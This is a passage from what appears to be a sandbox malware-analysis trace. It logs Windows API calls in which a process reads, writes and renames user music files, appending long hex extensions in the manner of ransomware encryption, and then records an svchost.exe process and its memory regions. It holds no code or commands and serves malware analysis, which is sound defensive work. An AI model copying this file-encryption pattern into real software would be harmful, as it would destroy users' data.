nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 0x0 [0124.315] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.321] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0124.323] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.593] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2c7ff70) returned 0x0 [0124.594] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav", lpString2=".7117E448E5F7649A4612DEDA86CA45A2233FAB7B9D8C028CA04DF428A5A46D22" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav.7117E448E5F7649A4612DEDA86CA45A2233FAB7B9D8C028CA04DF428A5A46D22") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\dpTDqU7W8QtcX-Gy.wav.7117E448E5F7649A4612DEDA86CA45A2233FAB7B9D8C028CA04DF428A5A46D22" [0124.594] GetProcessHeap () returned 0x600000 [0124.594] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x31182c8 [0124.594] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2c7ff60, FileInformation=0x31182c8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0124.596] CloseHandle (hObject=0x328) returned 1 [0124.596] GetProcessHeap () returned 0x600000 [0124.596] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.596] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.598] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2c7ff70) returned 0x0 [0124.599] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav", lpString2=".ACD2F7D158190F18077EE751174A79D4055F7B29C987EE9C9B6D362268E77E6D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav.ACD2F7D158190F18077EE751174A79D4055F7B29C987EE9C9B6D362268E77E6D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\j4TOE--GjIhBPgIUNOV3.wav.ACD2F7D158190F18077EE751174A79D4055F7B29C987EE9C9B6D362268E77E6D" [0124.599] GetProcessHeap () returned 0x600000 [0124.599] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x3154c60 [0124.599] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2c7ff60, FileInformation=0x3154c60, Length=0x126, FileInformationClass=0xa) returned 0x0 [0124.601] CloseHandle (hObject=0x33c) returned 1 [0124.601] GetProcessHeap () returned 0x600000 [0124.601] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.601] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.609] ReadFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.609] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.610] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.610] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a", lpString2=".3EA4DF3090BEAD6B9A01959371D569006D289522BDC2D5551C9C5B08EF32FD5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a.3EA4DF3090BEAD6B9A01959371D569006D289522BDC2D5551C9C5B08EF32FD5A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\dtsKxQLk8egoL7tj.m4a.3EA4DF3090BEAD6B9A01959371D569006D289522BDC2D5551C9C5B08EF32FD5A" [0124.611] GetProcessHeap () returned 0x600000 [0124.611] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x146) returned 0x3369848 [0124.611] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x3369848, Length=0x146, FileInformationClass=0xa) returned 0x0 [0124.612] CloseHandle (hObject=0x32c) returned 1 [0124.612] GetProcessHeap () returned 0x600000 [0124.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.612] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.615] ReadFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.616] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.616] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.617] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3", lpString2=".BA42557BC62B217954AAA127D492FCCD2ADA4C8295463A3ECF31F3E5C79AB21C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3.BA42557BC62B217954AAA127D492FCCD2ADA4C8295463A3ECF31F3E5C79AB21C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\gRfq03qGJiN.mp3.BA42557BC62B217954AAA127D492FCCD2ADA4C8295463A3ECF31F3E5C79AB21C" [0124.617] GetProcessHeap () returned 0x600000 [0124.617] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13c) returned 0x311a1e8 [0124.617] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x311a1e8, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0124.618] CloseHandle (hObject=0x32c) returned 1 [0124.618] GetProcessHeap () returned 0x600000 [0124.618] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.618] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.621] ReadFile (in: hFile=0x32c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.621] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.622] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.623] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a", lpString2=".3CB2C9EAFFB011EEB51F4F04D398F3358B6E00190A8DCE662AEBD15153A7272A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a.3CB2C9EAFFB011EEB51F4F04D398F3358B6E00190A8DCE662AEBD15153A7272A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\QOUnKwvlE.m4a.3CB2C9EAFFB011EEB51F4F04D398F3358B6E00190A8DCE662AEBD15153A7272A" [0124.623] GetProcessHeap () returned 0x600000 [0124.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x3151428 [0124.623] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x2c7ff60, FileInformation=0x3151428, Length=0x138, FileInformationClass=0xa) returned 0x0 [0124.623] CloseHandle (hObject=0x32c) returned 1 [0124.624] GetProcessHeap () returned 0x600000 [0124.624] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.624] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.628] ReadFile (in: hFile=0x334, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.628] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.629] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.630] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav", lpString2=".9DA46C0B47AE064680C0E191AFAADB25C61E1E28E2E61134E8248AB32EA86B4E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav.9DA46C0B47AE064680C0E191AFAADB25C61E1E28E2E61134E8248AB32EA86B4E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\qsP3prU\\EGglS6C.wav.9DA46C0B47AE064680C0E191AFAADB25C61E1E28E2E61134E8248AB32EA86B4E" [0124.630] GetProcessHeap () returned 0x600000 [0124.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x144) returned 0x33696f0 [0124.630] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x33696f0, Length=0x144, FileInformationClass=0xa) returned 0x0 [0124.631] CloseHandle (hObject=0x334) returned 1 [0124.631] GetProcessHeap () returned 0x600000 [0124.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.631] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.637] ReadFile (in: hFile=0x334, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.637] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.638] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.638] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a", lpString2=".7DA3295AAB95321441B9D63AAF800A249C278CDD5515E46CA4FD96926549E750" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a.7DA3295AAB95321441B9D63AAF800A249C278CDD5515E46CA4FD96926549E750") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\4mkyBkAvmV0qBfY.m4a.7DA3295AAB95321441B9D63AAF800A249C278CDD5515E46CA4FD96926549E750" [0124.638] GetProcessHeap () returned 0x600000 [0124.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x164) returned 0x315e4b0 [0124.639] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315e4b0, Length=0x164, FileInformationClass=0xa) returned 0x0 [0124.639] CloseHandle (hObject=0x334) returned 1 [0124.640] GetProcessHeap () returned 0x600000 [0124.640] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.640] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.643] ReadFile (in: hFile=0x334, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.643] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.644] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.645] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a", lpString2=".6DBD79ECFDB2E88EEF163309C444C6967B3EF1F66A370BFFC50264D491862A15" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a.6DBD79ECFDB2E88EEF163309C444C6967B3EF1F66A370BFFC50264D491862A15") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\gL807tElKxoX.m4a.6DBD79ECFDB2E88EEF163309C444C6967B3EF1F66A370BFFC50264D491862A15" [0124.645] GetProcessHeap () returned 0x600000 [0124.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15e) returned 0x336a198 [0124.645] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x336a198, Length=0x15e, FileInformationClass=0xa) returned 0x0 [0124.646] CloseHandle (hObject=0x334) returned 1 [0124.646] GetProcessHeap () returned 0x600000 [0124.646] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.646] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.649] ReadFile (in: hFile=0x334, lpBuffer=0x338e098, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.649] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.650] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x2c7ff70 | out: ObjectInformation=0x336e010, ReturnLength=0x2c7ff70) returned 0x0 [0124.651] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav", lpString2=".C8673CF5CFE6E90087714D2650C73DC6166A77D838BF73CA1374863050BE141E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav.C8673CF5CFE6E90087714D2650C73DC6166A77D838BF73CA1374863050BE141E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\pbC7nvlKsqbOTxeWZv9\\R5R-My iY_Mo5Vx\\NmW_RvyyurBlDEVx.wav.C8673CF5CFE6E90087714D2650C73DC6166A77D838BF73CA1374863050BE141E" [0124.651] GetProcessHeap () returned 0x600000 [0124.651] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315ed80 [0124.651] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x2c7ff60, FileInformation=0x315ed80, Length=0x166, FileInformationClass=0xa) returned 0x0 [0124.652] CloseHandle (hObject=0x334) returned 1 [0124.653] GetProcessHeap () returned 0x600000 [0124.653] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.655] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.662] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.662] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.986] ReadFile (in: hFile=0x33c, lpBuffer=0x690478, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.993] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0124.994] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0124.994] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0125.568] ReadFile (in: hFile=0x33c, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0125.573] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74) returned 1 [0125.573] WriteFile (in: hFile=0x32c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0125.574] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x2c7ff7c, lpCompletionKey=0x2c7ff78, lpOverlapped=0x2c7ff74, dwMilliseconds=0xffffffff) Thread: id = 125 os_tid = 0xd24 Thread: id = 126 os_tid = 0x6dc Thread: id = 127 os_tid = 0x6cc Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d312000" os_pid = "0x33c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x21c" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xe], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c630" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 280 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 281 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 282 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 283 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 284 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 285 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 286 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = 